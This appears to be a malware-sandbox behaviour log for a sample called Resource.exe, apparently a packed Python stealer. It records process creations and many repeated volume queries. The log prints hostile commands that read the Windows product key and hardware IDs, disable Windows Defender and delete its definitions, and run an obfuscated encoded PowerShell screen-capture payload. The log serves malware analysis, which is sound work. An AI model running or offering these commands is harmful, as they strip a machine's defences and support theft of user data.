Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3

Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe

Code function: 103_2_00007FF61860B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

103_2_00007FF61860B340

Source: C:\Users\user\Desktop\Resource.exe

Code function: 0_2_00007FF6E60C9E40 cpuid

0_2_00007FF6E60C9E40

Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\libcrypto-3.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\libffi-8.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\libssl-3.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\python311.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\sqlite3.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
